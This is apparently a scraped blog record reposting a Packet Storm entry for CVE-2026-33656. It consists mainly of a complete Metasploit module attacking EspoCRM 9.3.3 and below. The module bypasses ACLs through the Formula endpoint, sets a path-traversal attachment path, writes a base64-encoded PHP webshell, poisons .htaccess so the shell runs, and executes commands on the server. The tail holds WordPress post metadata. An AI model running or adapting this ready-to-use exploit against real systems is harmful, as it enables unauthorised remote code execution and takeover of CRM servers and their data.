{“lastseen”:”2026-04-17T17:23:22″,”description”:”This Metasploit module targets an authenticated remote code execution vulnerability in EspoCRM versions 9.3.3 and below…”,”published”:”2026-04-17T00:00:00″,”modified”:”2026-04-17T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:219085″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-33656″],”sourceData”:”==================================================================================================================================\\n | # Title : EspoCRM \u2264 9.3.3 Authenticated RCE Exploit via Formula ACL Bypass and Attachment Abuse |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/www.espocrm.com\/download\/upgrades\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : This Metasploit module targets an authenticated Remote Code Execution (RCE) vulnerability in EspoCRM versions up to 9.3.3.\\n \\n [+] The exploit chain works as follows:\\n \\n Authenticates to the EspoCRM API using provided credentials.\\n Creates a malicious attachment entry via the Attachment API.\\n Abuses a Formula Engine endpoint to bypass ACL restrictions.\\n Uses the formula execution to manipulate internal attachment paths (path traversal).\\n Uploads a PHP webshell payload through chunked attachment upload.\\n Poisones a .htaccess file to enable execution of PHP code in a restricted directory.\\n Triggers the uploaded webshell via an HTTP request with a command parameter (whoami as proof of execution).\\n \\n \\n [+] POC : \\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n include Msf::Exploit::Remote::HttpClient\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘EspoCRM \\u003c= 9.3.3 Authenticated RCE via Formula ACL Bypass’,\\n ‘Description’ =\\u003e %q{\\n Authenticated RCE in EspoCRM via formula ACL bypass + attachment abuse.\\n },\\n ‘Author’ =\\u003e [\\n ‘indoushka’\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [ ‘URL’, ‘https:\/\/jivasecurity.com\/writeups\/espocrm-rce’ ],\\n [ ‘CVE’, ‘2026-33656’ ]\\n ],\\n ‘Platform’ =\\u003e [‘php’],\\n ‘Arch’ =\\u003e [ARCH_PHP],\\n ‘Targets’ =\\u003e [\\n [ ‘EspoCRM \\u003c= 9.3.3’, { ‘Platform’ =\\u003e ‘php’, ‘Arch’ =\\u003e ARCH_PHP } ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2026-01-01’\\n )\\n )\\n \\n register_options(\\n [\\n Opt::RPORT(80),\\n OptString.new(‘TARGETURI’, [true, ‘Base path’, ‘\/’]),\\n OptString.new(‘USERNAME’, [true, ‘Username’, ‘admin’]),\\n OptString.new(‘PASSWORD’, [true, ‘Password’, ‘admin’])\\n ]\\n )\\n end\\n \\n def auth_headers\\n creds = \\”#{datastore[‘USERNAME’]}:#{datastore[‘PASSWORD’]}\\”\\n token = Rex::Text.encode_base64(creds)\\n \\n {\\n ‘Espo-Authorization’ =\\u003e token\\n }\\n end\\n \\n def check\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api\/v1\/App\/user’),\\n ‘headers’ =\\u003e auth_headers\\n )\\n \\n return Exploit::CheckCode::Detected if res \\u0026\\u0026 res.code == 200\\n Exploit::CheckCode::Safe\\n end\\n \\n def create_attachment(name, content_type, size)\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api\/v1\/Attachment’),\\n ‘headers’ =\\u003e auth_headers.merge({\\n ‘Content-Type’ =\\u003e ‘application\/json’\\n }),\\n ‘data’ =\\u003e {\\n ‘name’ =\\u003e name,\\n ‘type’ =\\u003e content_type,\\n ‘role’ =\\u003e ‘Attachment’,\\n ‘relatedType’ =\\u003e ‘Document’,\\n ‘field’ =\\u003e ‘file’,\\n ‘isBeingUploaded’ =\\u003e true,\\n ‘size’ =\\u003e size\\n }.to_json\\n )\\n \\n return nil unless res \\u0026\\u0026 res.code == 200\\n res.get_json_document\\u0026.dig(‘id’)\\n end\\n \\n def run_formula(attachment_id, source_path)\\n expr = \\”record\\\\\\\\update(\\\\\\”Attachment\\\\\\”,\\\\\\”#{attachment_id}\\\\\\”,\\\\\\”sourceId\\\\\\”,\\\\\\”#{source_path}\\\\\\”)\\”\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api\/v1\/Formula\/action\/run’),\\n ‘headers’ =\\u003e auth_headers.merge({\\n ‘Content-Type’ =\\u003e ‘application\/json’\\n }),\\n ‘data’ =\\u003e {\\n ‘expression’ =\\u003e expr,\\n ‘targetType’ =\\u003e nil,\\n ‘targetId’ =\\u003e nil\\n }.to_json\\n )\\n \\n return false unless res \\u0026\\u0026 res.code == 200\\n \\n json = res.get_json_document rescue nil\\n json \\u0026\\u0026 json[‘isSuccess’] == true\\n end\\n \\n def upload_chunk(attachment_id, payload_base64)\\n send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, \\”api\/v1\/Attachment\/chunk\/#{attachment_id}\\”),\\n ‘headers’ =\\u003e auth_headers.merge({\\n ‘Content-Type’ =\\u003e ‘application\/octet-stream’\\n }),\\n ‘data’ =\\u003e \\”data:application\/octet-stream;base64,#{payload_base64}\\”\\n )\\n end\\n \\n def exploit\\n print_status(\\”Creating attachment…\\”)\\n shell_id = create_attachment(‘shell.txt’, ‘text\/plain’, 0)\\n fail_with(Failure::UnexpectedReply, \\”Attachment failed\\”) unless shell_id\\n \\n print_good(\\”Attachment ID: #{shell_id}\\”)\\n \\n print_status(\\”Bypassing ACL via formula…\\”)\\n fail_with(Failure::UnexpectedReply, \\”Formula failed\\”) unless run_formula(shell_id, ‘..\/..\/client\/x’)\\n \\n print_good(\\”Path traversal set\\”)\\n \\n print_status(\\”Uploading PHP payload…\\”)\\n php_payload = \\”PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOyA\/Pg==\\”\\n upload_chunk(shell_id, php_payload)\\n \\n print_good(\\”Webshell written\\”)\\n \\n print_status(\\”Creating .htaccess entry…\\”)\\n ht_id = create_attachment(‘ht.txt’, ‘text\/plain’, 0)\\n fail_with(Failure::UnexpectedReply, \\”HT creation failed\\”) unless ht_id\\n \\n fail_with(Failure::UnexpectedReply, \\”HT formula failed\\”) unless run_formula(ht_id, ‘..\/..\/.htaccess’)\\n \\n ht_payload = \\”CjxGaWxlc01hdGNoICJeeCQiPgpTZXRIYW5kbGVyIGFwcGxpY2F0aW9uL3gtaHR0cGQtcGhwCjwvRmlsZXNNYXRjaD4=\\”\\n upload_chunk(ht_id, ht_payload)\\n \\n print_good(\\”.htaccess poisoned\\”)\\n \\n webshell = normalize_uri(target_uri.path, ‘client\/x’)\\n \\n print_status(\\”Executing: #{webshell}\\”)\\n \\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e webshell,\\n ‘vars_get’ =\\u003e {\\n ‘c’ =\\u003e ‘whoami’\\n }\\n )\\n \\n if res \\u0026\\u0026 res.code == 200\\n print_good(\\”Execution success\\”)\\n print_line(res.body.to_s) if res.body\\n else\\n fail_with(Failure::UnexpectedReply, \\”Execution failed\\”)\\n end\\n end\\n end\\n \\n \\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219085″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219085\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-17T17:23:22″,”description”:”This Metasploit module targets an authenticated remote code execution vulnerability in EspoCRM versions 9.3.3 and below…”,”published”:”2026-04-17T00:00:00″,”modified”:”2026-04-17T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 EspoCRM 9.3.3 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:219085″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-33656″],”sourceData”:”==================================================================================================================================\\n | # Title :…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-47684","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n